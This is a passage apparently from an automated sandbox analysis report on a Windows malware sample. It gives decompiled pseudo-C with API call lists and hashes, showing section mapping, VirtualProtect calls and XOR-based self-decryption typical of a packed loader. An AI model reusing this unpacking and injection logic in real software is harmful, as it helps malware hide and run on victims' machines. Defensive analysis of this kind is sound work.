                                                                                                                                                                        • API String ID: 4139908857-141991303
                                                                                                                                                                        • Opcode ID: f6d75bd0e5872fe3b7fc5afb4619f4517c521f8f65f1602023bb858a8ef3261e
                                                                                                                                                                        • Instruction ID: 3c15832363627b704726adb83fb2a2b8f3f879782681c80ed6739e0df40de01b
                                                                                                                                                                        • Opcode Fuzzy Hash: f6d75bd0e5872fe3b7fc5afb4619f4517c521f8f65f1602023bb858a8ef3261e
                                                                                                                                                                        • Instruction Fuzzy Hash: 28F0F933B1171557D620EB5A9D40B677798EB85715B024237A509F72E0C6799C008FED
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                        			E0040171A(void* _a4, void* _a8, PVOID* _a12) {
                                                                                                                                                                        				long _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				long _t12;
                                                                                                                                                                        
                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                        				_t12 = NtMapViewOfSection(_a4, _a8, _a12, 0, 0,  &_v16,  &_v8, 2, 0, 0x40); // executed
                                                                                                                                                                        				return RtlNtStatusToDosError(_t12);
                                                                                                                                                                        			}







                                                                                                                                                                        0x0040172a
                                                                                                                                                                        0x00401730
                                                                                                                                                                        0x0040173e
                                                                                                                                                                        0x00401747
                                                                                                                                                                        0x00401756

                                                                                                                                                                        APIs
                                                                                                                                                                        • NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 00401747
                                                                                                                                                                        • RtlNtStatusToDosError.NTDLL ref: 0040174E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorSectionStatusView
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1313840181-0
                                                                                                                                                                        • Opcode ID: 974a8da6c5e5cc3c283821e991db667493e230da3138465f8dbd521083291205
                                                                                                                                                                        • Instruction ID: 177d7cb7bfda170df309ecd4434f9b42d039ef21d8e8738f197cbd30496234ce
                                                                                                                                                                        • Opcode Fuzzy Hash: 974a8da6c5e5cc3c283821e991db667493e230da3138465f8dbd521083291205
                                                                                                                                                                        • Instruction Fuzzy Hash: 17E0C0B6900208BFDB059F94DD0AEEF7B7DEB44300F00856AB615A5150E6B0AA189B60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 98%
                                                                                                                                                                        			E00401980(void* __ecx, void* __edx) {
                                                                                                                                                                        				short _v60;
                                                                                                                                                                        				short _v68;
                                                                                                                                                                        				unsigned int _v76;
                                                                                                                                                                        				void _v92;
                                                                                                                                                                        				long _v96;
                                                                                                                                                                        				intOrPtr _v100;
                                                                                                                                                                        				void* _v104;
                                                                                                                                                                        				char _v108;
                                                                                                                                                                        				signed int _v112;
                                                                                                                                                                        				long _v116;
                                                                                                                                                                        				unsigned int _v120;
                                                                                                                                                                        				signed int _v124;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				long _t32;
                                                                                                                                                                        				void* _t33;
                                                                                                                                                                        				signed int _t37;
                                                                                                                                                                        				unsigned int _t42;
                                                                                                                                                                        				unsigned int _t43;
                                                                                                                                                                        				intOrPtr _t44;
                                                                                                                                                                        				char _t46;
                                                                                                                                                                        				void* _t55;
                                                                                                                                                                        				void* _t56;
                                                                                                                                                                        				signed int _t61;
                                                                                                                                                                        				signed int _t66;
                                                                                                                                                                        				void* _t67;
                                                                                                                                                                        				signed int _t68;
                                                                                                                                                                        				signed int _t70;
                                                                                                                                                                        				signed int _t71;
                                                                                                                                                                        				signed char* _t72;
                                                                                                                                                                        				void* _t74;
                                                                                                                                                                        				signed char* _t75;
                                                                                                                                                                        				signed int* _t80;
                                                                                                                                                                        				void* _t81;
                                                                                                                                                                        				void* _t82;
                                                                                                                                                                        				signed int _t84;
                                                                                                                                                                        				signed int _t88;
                                                                                                                                                                        				WCHAR* _t104;
                                                                                                                                                                        
                                                                                                                                                                        				_t74 = __edx;
                                                                                                                                                                        				_t67 = __ecx;
                                                                                                                                                                        				_t84 = 0;
                                                                                                                                                                        				_v116 = 0;
                                                                                                                                                                        				_t32 = E00401342();
                                                                                                                                                                        				if(_t32 != 0) {
                                                                                                                                                                        					L22:
                                                                                                                                                                        					return _t32;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t32 = E00401804(); // executed
                                                                                                                                                                        				if(_t32 != 0) {
                                                                                                                                                                        					goto L22;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t33 = E004012E6(_t67); // executed
                                                                                                                                                                        					if(_t33 != 0) {
                                                                                                                                                                        						 *0x405478 = 1;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t32 = E00401873();
                                                                                                                                                                        					_t97 = _t32 - _t84;
                                                                                                                                                                        					if(_t32 != _t84) {
                                                                                                                                                                        						L20:
                                                                                                                                                                        						if(_t32 == 0xffffffff) {
                                                                                                                                                                        							_t32 = GetLastError();
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L22;
                                                                                                                                                                        					}
                                                                                                                                                                        					E00401C6C(_t67, _t74, _t97); // executed
                                                                                                                                                                        					_t68 = 6;
                                                                                                                                                                        					memset( &_v92, 0, _t68 << 2);
                                                                                                                                                                        					_t37 =  *0x405490; // 0x736c6e70
                                                                                                                                                                        					if(E004021B3(0,  &_v92,  &_v76, _t37 ^ 0xed79247c) == 0) {
                                                                                                                                                                        						_t32 = 0xb;
                                                                                                                                                                        						goto L20;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t42 = _v76;
                                                                                                                                                                        					_t80 = _v92;
                                                                                                                                                                        					_t66 =  *0x40548c; // 0x0
                                                                                                                                                                        					_t70 = _t42;
                                                                                                                                                                        					_t43 = _t42 >> 2;
                                                                                                                                                                        					_v112 = _t70;
                                                                                                                                                                        					_v124 = _t84;
                                                                                                                                                                        					_t75 = _t80;
                                                                                                                                                                        					_v120 = _t43;
                                                                                                                                                                        					if(_t43 == 0) {
                                                                                                                                                                        						L9:
                                                                                                                                                                        						_t71 = _t70 & 0x00000003;
                                                                                                                                                                        						if(_t71 == 0) {
                                                                                                                                                                        							L12:
                                                                                                                                                                        							_t104 =  *0x405484; // 0x2888808
                                                                                                                                                                        							if(_t104 != 0) {
                                                                                                                                                                        								wsprintfW( &_v68, 0x4040f0, GetCurrentProcessId());
                                                                                                                                                                        								_t55 = CreateFileMappingW(0xffffffff, 0, 4, 0, lstrlenW( *0x405484) + _t53 + 2,  &_v60); // executed
                                                                                                                                                                        								if(_t55 != 0) {
                                                                                                                                                                        									_t56 = MapViewOfFile(_t55, 6, 0, 0, 0); // executed
                                                                                                                                                                        									_t81 = _t56;
                                                                                                                                                                        									if(_t81 != 0) {
                                                                                                                                                                        										lstrcpyW(_t81,  *0x405484);
                                                                                                                                                                        										UnmapViewOfFile(_t81);
                                                                                                                                                                        									}
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        							if(( *0x405478 & 0x00000001) != 0) {
                                                                                                                                                                        								_v116 = 0x10;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t44 =  *0x405470; // 0x1ae8
                                                                                                                                                                        							_v100 = _t44;
                                                                                                                                                                        							_v96 = GetCurrentThreadId();
                                                                                                                                                                        							_t46 =  *0x40546c; // 0x1a0
                                                                                                                                                                        							_v108 = _t46;
                                                                                                                                                                        							_v104 = GetCurrentThread();
                                                                                                                                                                        							_t32 = E004022D1(_t75,  &_v92,  &_v108, _v116); // executed
                                                                                                                                                                        							goto L20;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t88 = _t71;
                                                                                                                                                                        						_t72 = _t75;
                                                                                                                                                                        						_t82 = _t80 - _t75;
                                                                                                                                                                        						do {
                                                                                                                                                                        							 *_t72 =  *(_t82 + _t72) ^ _t66;
                                                                                                                                                                        							_t72 =  &(_t72[1]);
                                                                                                                                                                        							_t88 = _t88 - 1;
                                                                                                                                                                        						} while (_t88 != 0);
                                                                                                                                                                        						goto L12;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						goto L7;
                                                                                                                                                                        					}
                                                                                                                                                                        					do {
                                                                                                                                                                        						L7:
                                                                                                                                                                        						_v124 = _v124 + 1;
                                                                                                                                                                        						_t61 =  *_t80;
                                                                                                                                                                        						asm("rol eax, cl");
                                                                                                                                                                        						_t80 =  &(_t80[1]);
                                                                                                                                                                        						_t84 = _t61 ^ _t84 ^ _t66;
                                                                                                                                                                        						 *_t75 = _t84;
                                                                                                                                                                        						_t75 =  &(_t75[4]);
                                                                                                                                                                        						_t14 =  &_v120;
                                                                                                                                                                        						 *_t14 = _v120 - 1;
                                                                                                                                                                        					} while ( *_t14 != 0);
                                                                                                                                                                        					_t70 = _v112;
                                                                                                                                                                        					goto L9;
                                                                                                                                                                        				}
                                                                                                                                                                        			}








































                                                                                                                                                                        0x00401980
                                                                                                                                                                        0x00401980
                                                                                                                                                                        0x0040198b
                                                                                                                                                                        0x0040198e
                                                                                                                                                                        0x00401992
                                                                                                                                                                        0x00401999
                                                                                                                                                                        0x00401b24
                                                                                                                                                                        0x00401b2a
                                                                                                                                                                        0x00401b2a
                                                                                                                                                                        0x0040199f
                                                                                                                                                                        0x004019a6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004019ac
                                                                                                                                                                        0x004019ac
                                                                                                                                                                        0x004019b3
                                                                                                                                                                        0x004019b5
                                                                                                                                                                        0x004019b5
                                                                                                                                                                        0x004019bf
                                                                                                                                                                        0x004019c4
                                                                                                                                                                        0x004019c6
                                                                                                                                                                        0x00401b19
                                                                                                                                                                        0x00401b1c
                                                                                                                                                                        0x00401b1e
                                                                                                                                                                        0x00401b1e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401b1c
                                                                                                                                                                        0x004019cc
                                                                                                                                                                        0x004019d5
                                                                                                                                                                        0x004019da
                                                                                                                                                                        0x004019dc
                                                                                                                                                                        0x004019f8
                                                                                                                                                                        0x00401b18
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401b18
                                                                                                                                                                        0x004019fe
                                                                                                                                                                        0x00401a02
                                                                                                                                                                        0x00401a06
                                                                                                                                                                        0x00401a0c
                                                                                                                                                                        0x00401a0e
                                                                                                                                                                        0x00401a11
                                                                                                                                                                        0x00401a15
                                                                                                                                                                        0x00401a19
                                                                                                                                                                        0x00401a1b
                                                                                                                                                                        0x00401a1f
                                                                                                                                                                        0x00401a45
                                                                                                                                                                        0x00401a45
                                                                                                                                                                        0x00401a48
                                                                                                                                                                        0x00401a5b
                                                                                                                                                                        0x00401a5d
                                                                                                                                                                        0x00401a63
                                                                                                                                                                        0x00401a76
                                                                                                                                                                        0x00401a9b
                                                                                                                                                                        0x00401aa3
                                                                                                                                                                        0x00401aab
                                                                                                                                                                        0x00401ab1
                                                                                                                                                                        0x00401ab5
                                                                                                                                                                        0x00401abe
                                                                                                                                                                        0x00401ac5
                                                                                                                                                                        0x00401ac5
                                                                                                                                                                        0x00401ab5
                                                                                                                                                                        0x00401aa3
                                                                                                                                                                        0x00401ad2
                                                                                                                                                                        0x00401ad4
                                                                                                                                                                        0x00401ad4
                                                                                                                                                                        0x00401adc
                                                                                                                                                                        0x00401ae1
                                                                                                                                                                        0x00401aeb
                                                                                                                                                                        0x00401aef
                                                                                                                                                                        0x00401af4
                                                                                                                                                                        0x00401b02
                                                                                                                                                                        0x00401b0f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401b0f
                                                                                                                                                                        0x00401a4a
                                                                                                                                                                        0x00401a4c
                                                                                                                                                                        0x00401a4e
                                                                                                                                                                        0x00401a50
                                                                                                                                                                        0x00401a55
                                                                                                                                                                        0x00401a57
                                                                                                                                                                        0x00401a58
                                                                                                                                                                        0x00401a58
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401a21
                                                                                                                                                                        0x00401a21
                                                                                                                                                                        0x00401a21
                                                                                                                                                                        0x00401a25
                                                                                                                                                                        0x00401a2b
                                                                                                                                                                        0x00401a2d
                                                                                                                                                                        0x00401a34
                                                                                                                                                                        0x00401a36
                                                                                                                                                                        0x00401a38
                                                                                                                                                                        0x00401a3b
                                                                                                                                                                        0x00401a3b
                                                                                                                                                                        0x00401a3b
                                                                                                                                                                        0x00401a41
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401a41

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00401342: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00401997,?,00000000), ref: 00401351
                                                                                                                                                                          • Part of subcall function 00401342: GetVersion.KERNEL32(?,00000000), ref: 00401360
                                                                                                                                                                          • Part of subcall function 00401342: GetCurrentProcessId.KERNEL32(?,00000000), ref: 00401377
                                                                                                                                                                          • Part of subcall function 00401342: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000000), ref: 00401390
                                                                                                                                                                          • Part of subcall function 004012E6: GetModuleHandleA.KERNELBASE(00406016,00000000,?,?,004019B1,?,00000000), ref: 00401303
                                                                                                                                                                          • Part of subcall function 004012E6: GetProcAddress.KERNELBASE(00000000,00406209), ref: 00401314
                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,736C6E70,?,00000000), ref: 00401A65
                                                                                                                                                                        • wsprintfW.USER32 ref: 00401A76
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00401A8A
                                                                                                                                                                        • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,?), ref: 00401A9B
                                                                                                                                                                        • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00401AAB
                                                                                                                                                                        • lstrcpyW.KERNEL32 ref: 00401ABE
                                                                                                                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00401AE5
                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 00401AF8
                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 00401B1E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Current$FileProcess$CreateThreadView$AddressErrorEventHandleLastMappingModuleOpenProcUnmapVersionlstrcpylstrlenwsprintf
                                                                                                                                                                        • String ID: pnls
                                                                                                                                                                        • API String ID: 1887955078-141991303
                                                                                                                                                                        • Opcode ID: 2a75da98b7358f4dbcc57d5f3d012a061073d7ae8a3f33a0b7cbb0297221129f
                                                                                                                                                                        • Instruction ID: 4caec36e83c9f8a5fb1ddda594c80eefce4d5a052f5e2ea32368159318993c28
                                                                                                                                                                        • Opcode Fuzzy Hash: 2a75da98b7358f4dbcc57d5f3d012a061073d7ae8a3f33a0b7cbb0297221129f
                                                                                                                                                                        • Instruction Fuzzy Hash: 1E41C3716052009BC711AF64DE48A9BBBF8EB88755F14093AF685F32B1D734D844CBAA
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                        			E00402C3F(void* __ebx, void* __edx, void* __eflags, struct _CRITICAL_SECTION* _a4, unsigned int _a8, intOrPtr _a12) {
                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                        				void* _t16;
                                                                                                                                                                        				int _t24;
                                                                                                                                                                        				intOrPtr _t27;
                                                                                                                                                                        				intOrPtr* _t29;
                                                                                                                                                                        				unsigned int _t34;
                                                                                                                                                                        				long _t35;
                                                                                                                                                                        				intOrPtr* _t36;
                                                                                                                                                                        
                                                                                                                                                                        				_push(0x18);
                                                                                                                                                                        				_t34 = _a8 >> 0xc;
                                                                                                                                                                        				_t36 = E004017EF(_t16, __ebx, __eflags);
                                                                                                                                                                        				if(_t36 == 0) {
                                                                                                                                                                        					_t35 = 8;
                                                                                                                                                                        					L11:
                                                                                                                                                                        					return _t35;
                                                                                                                                                                        				}
                                                                                                                                                                        				_push(__ebx);
                                                                                                                                                                        				 *(_t36 + 8) = _t34;
                                                                                                                                                                        				 *((intOrPtr*)(_t36 + 0x10)) = _a12;
                                                                                                                                                                        				 *((intOrPtr*)(_t36 + 0x14)) = 0;
                                                                                                                                                                        				EnterCriticalSection(_a4);
                                                                                                                                                                        				_t29 = E00402192(_a4, _t34);
                                                                                                                                                                        				if(_t29 == _a4 + 0x18 ||  *((intOrPtr*)(_t29 + 8)) != _t34) {
                                                                                                                                                                        					_t10 = _t36 + 0xc; // 0xc
                                                                                                                                                                        					_t24 = VirtualProtect(_a8, 1, 1, _t10); // executed
                                                                                                                                                                        					__eflags = _t24;
                                                                                                                                                                        					if(_t24 == 0) {
                                                                                                                                                                        						_t35 = GetLastError();
                                                                                                                                                                        					} else {
                                                                                                                                                                        						 *((intOrPtr*)(_t36 + 4)) = _t36;
                                                                                                                                                                        						 *_t36 = _t36;
                                                                                                                                                                        						_t27 =  *_t29;
                                                                                                                                                                        						 *_t36 = _t27;
                                                                                                                                                                        						 *((intOrPtr*)(_t36 + 4)) = _t29;
                                                                                                                                                                        						 *((intOrPtr*)(_t27 + 4)) = _t36;
                                                                                                                                                                        						 *_t29 = _t36;
                                                                                                                                                                        						_t35 = 0;
                                                                                                                                                                        					}
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t35 = 0xb7;
                                                                                                                                                                        				}
                                                                                                                                                                        				LeaveCriticalSection(_a4);
                                                                                                                                                                        				if(_t35 != 0) {
                                                                                                                                                                        					E00401759(_t36);
                                                                                                                                                                        					if(_t35 == 0xb7) {
                                                                                                                                                                        						_t35 = 0;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				goto L11;
                                                                                                                                                                        			}











                                                                                                                                                                        0x00402c47
                                                                                                                                                                        0x00402c49
                                                                                                                                                                        0x00402c51
                                                                                                                                                                        0x00402c55
                                                                                                                                                                        0x00402cea
                                                                                                                                                                        0x00402ceb
                                                                                                                                                                        0x00402cf0
                                                                                                                                                                        0x00402cf0
                                                                                                                                                                        0x00402c5e
                                                                                                                                                                        0x00402c62
                                                                                                                                                                        0x00402c65
                                                                                                                                                                        0x00402c68
                                                                                                                                                                        0x00402c6f
                                                                                                                                                                        0x00402c7e
                                                                                                                                                                        0x00402c88
                                                                                                                                                                        0x00402c96
                                                                                                                                                                        0x00402ca1
                                                                                                                                                                        0x00402ca7
                                                                                                                                                                        0x00402ca9
                                                                                                                                                                        0x00402cc6
                                                                                                                                                                        0x00402cab
                                                                                                                                                                        0x00402cab
                                                                                                                                                                        0x00402cae
                                                                                                                                                                        0x00402cb0
                                                                                                                                                                        0x00402cb2
                                                                                                                                                                        0x00402cb4
                                                                                                                                                                        0x00402cb7
                                                                                                                                                                        0x00402cba
                                                                                                                                                                        0x00402cbc
                                                                                                                                                                        0x00402cbc
                                                                                                                                                                        0x00402c8f
                                                                                                                                                                        0x00402c8f
                                                                                                                                                                        0x00402c8f
                                                                                                                                                                        0x00402ccb
                                                                                                                                                                        0x00402cd4
                                                                                                                                                                        0x00402cd7
                                                                                                                                                                        0x00402ce2
                                                                                                                                                                        0x00402ce4
                                                                                                                                                                        0x00402ce4
                                                                                                                                                                        0x00402ce2
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004017EF: HeapAlloc.KERNEL32(00000000,?,00402F3B,00000028,?,00000000,00401829,?,00000000,?,?,004019A4,?,00000000), ref: 004017FB
                                                                                                                                                                        • EnterCriticalSection.KERNEL32(00000000,00000000,00000018,?,Nov 27 2018,?,00401B78,?,?,00000000,?,Nov 27 2018,00400000,C70A74C0,?,00401852), ref: 00402C6F
                                                                                                                                                                        • VirtualProtect.KERNELBASE(?,00000001,00000001,0000000C,?,?,00401B78,?,?,00000000,?,Nov 27 2018,00400000,C70A74C0,?,00401852), ref: 00402CA1
                                                                                                                                                                        • GetLastError.KERNEL32(?,00401B78,?,?,00000000,?,Nov 27 2018,00400000,C70A74C0,?,00401852,C70A74C0,?,00000000,?,00000000), ref: 00402CC0
                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00000000,?,00401B78,?,?,00000000,?,Nov 27 2018,00400000,C70A74C0,?,00401852,C70A74C0,?,00000000,?), ref: 00402CCB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$AllocEnterErrorHeapLastLeaveProtectVirtual
                                                                                                                                                                        • String ID: Nov 27 2018
                                                                                                                                                                        • API String ID: 1328245997-3268329997
                                                                                                                                                                        • Opcode ID: 59041497bef81b6d9aff65f8b18ffacbfce1d9f0f3900f9e81025ae718ea1d73
                                                                                                                                                                        • Instruction ID: 7fd9c40926545a752c4d662743fe78391a9f6cb161dd72072a4b975be33c32d9
                                                                                                                                                                        • Opcode Fuzzy Hash: 59041497bef81b6d9aff65f8b18ffacbfce1d9f0f3900f9e81025ae718ea1d73
                                                                                                                                                                        • Instruction Fuzzy Hash: 5E21C072204714DBEB209F19CA48B5E7BE9BF84710F10843BF649AB3D0C7B49841CBA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			_entry_() {
                                                                                                                                                                        				void* _t1;
                                                                                                                                                                        				int _t4;
                                                                                                                                                                        				void* _t6;
                                                                                                                                                                        				void* _t7;
                                                                                                                                                                        				int _t8;
                                                                                                                                                                        
                                                                                                                                                                        				_t8 = 0;
                                                                                                                                                                        				_t1 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                                                        				 *0x405438 = _t1;
                                                                                                                                                                        				if(_t1 != 0) {
                                                                                                                                                                        					 *0x40547c = GetModuleHandleA(0);
                                                                                                                                                                        					GetCommandLineW(); // executed
                                                                                                                                                                        					_t4 = E00401980(_t6, _t7); // executed
                                                                                                                                                                        					_t8 = _t4; // executed
                                                                                                                                                                        					HeapDestroy( *0x405438); // executed
                                                                                                                                                                        				}
                                                                                                                                                                        				ExitProcess(_t8);
                                                                                                                                                                        			}








                                                                                                                                                                        0x00401b99
                                                                                                                                                                        0x00401ba2
                                                                                                                                                                        0x00401baa
                                                                                                                                                                        0x00401baf
                                                                                                                                                                        0x00401bb8
                                                                                                                                                                        0x00401bbd
                                                                                                                                                                        0x00401bc3
                                                                                                                                                                        0x00401bce
                                                                                                                                                                        0x00401bd0
                                                                                                                                                                        0x00401bd0
                                                                                                                                                                        0x00401bd7

                                                                                                                                                                        APIs
                                                                                                                                                                        • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00401BA2
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 00401BB2
                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 00401BBD
                                                                                                                                                                          • Part of subcall function 00401980: GetCurrentProcessId.KERNEL32(?,?,736C6E70,?,00000000), ref: 00401A65
                                                                                                                                                                          • Part of subcall function 00401980: wsprintfW.USER32 ref: 00401A76
                                                                                                                                                                          • Part of subcall function 00401980: lstrlenW.KERNEL32(?), ref: 00401A8A
                                                                                                                                                                          • Part of subcall function 00401980: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,?), ref: 00401A9B
                                                                                                                                                                        • HeapDestroy.KERNELBASE ref: 00401BD0
                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00401BD7
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateHeapProcess$CommandCurrentDestroyExitFileHandleLineMappingModulelstrlenwsprintf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1996550440-0
                                                                                                                                                                        • Opcode ID: db4ff8f327a96312085b73e2dd1bc9e0a90428c9eb53a64be6c69bf1021327be
                                                                                                                                                                        • Instruction ID: 108fe706f2659071e8fd9801d4f60fcc127283e106fcb6075fde737f109390ca
                                                                                                                                                                        • Opcode Fuzzy Hash: db4ff8f327a96312085b73e2dd1bc9e0a90428c9eb53a64be6c69bf1021327be
                                                                                                                                                                        • Instruction Fuzzy Hash: 0BE092B18026209BC7212B71AE4CB8A7A64FB45356B140435F701B2170DB3848808EAC
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                        			E00401DA3(void* __ecx, struct _CRITICAL_SECTION* _a4, long _a8, signed int _a12) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				intOrPtr _t30;
                                                                                                                                                                        				signed int _t31;
                                                                                                                                                                        				signed int _t32;
                                                                                                                                                                        				signed int _t34;
                                                                                                                                                                        				int _t36;
                                                                                                                                                                        				long _t37;
                                                                                                                                                                        				void* _t39;
                                                                                                                                                                        				void* _t42;
                                                                                                                                                                        				signed int _t45;
                                                                                                                                                                        				signed int _t47;
                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                        				signed int _t52;
                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                        				void* _t56;
                                                                                                                                                                        
                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                        				_t39 = _a8;
                                                                                                                                                                        				_v8 = 0x490;
                                                                                                                                                                        				_t50 = _t39 >> 0xc;
                                                                                                                                                                        				EnterCriticalSection(_a4);
                                                                                                                                                                        				_t56 = E00402192(_a4, _t50);
                                                                                                                                                                        				if(_t56 != _a4 + 0x18 &&  *((intOrPtr*)(_t56 + 8)) == _t50) {
                                                                                                                                                                        					_t30 =  *((intOrPtr*)(_t56 + 0x14));
                                                                                                                                                                        					if(_a12 == 0) {
                                                                                                                                                                        						_t52 = _t50 | 0xffffffff;
                                                                                                                                                                        						_t30 = _t30 - 1;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t52 = 1;
                                                                                                                                                                        					}
                                                                                                                                                                        					_v8 = _v8 & 0x00000000;
                                                                                                                                                                        					if(_t30 != 0) {
                                                                                                                                                                        						L8:
                                                                                                                                                                        						 *((intOrPtr*)(_t56 + 0x14)) =  *((intOrPtr*)(_t56 + 0x14)) + _t52;
                                                                                                                                                                        						_t31 =  *(_t56 + 0x10);
                                                                                                                                                                        						_a12 = _t31;
                                                                                                                                                                        						if(_t31 != 0) {
                                                                                                                                                                        							_t47 = _t39 & 0xfffff000;
                                                                                                                                                                        							_t53 = 0;
                                                                                                                                                                        							_t42 = 0;
                                                                                                                                                                        							_a8 = 0x400;
                                                                                                                                                                        							do {
                                                                                                                                                                        								_t32 =  *_t47;
                                                                                                                                                                        								_t45 = _t32;
                                                                                                                                                                        								if(_t32 == 0) {
                                                                                                                                                                        									_a8 = 1;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									_t34 = _t32 ^ _t53 ^ _a12;
                                                                                                                                                                        									_t42 = _t42 + 1;
                                                                                                                                                                        									_t53 = _t45;
                                                                                                                                                                        									asm("ror eax, cl");
                                                                                                                                                                        									 *_t47 = _t34;
                                                                                                                                                                        									_t47 = _t47 + 4;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t20 =  &_a8;
                                                                                                                                                                        								 *_t20 = _a8 - 1;
                                                                                                                                                                        							} while ( *_t20 != 0);
                                                                                                                                                                        							 *(_t56 + 0x10) =  *(_t56 + 0x10) & 0x00000000;
                                                                                                                                                                        						}
                                                                                                                                                                        					} else {
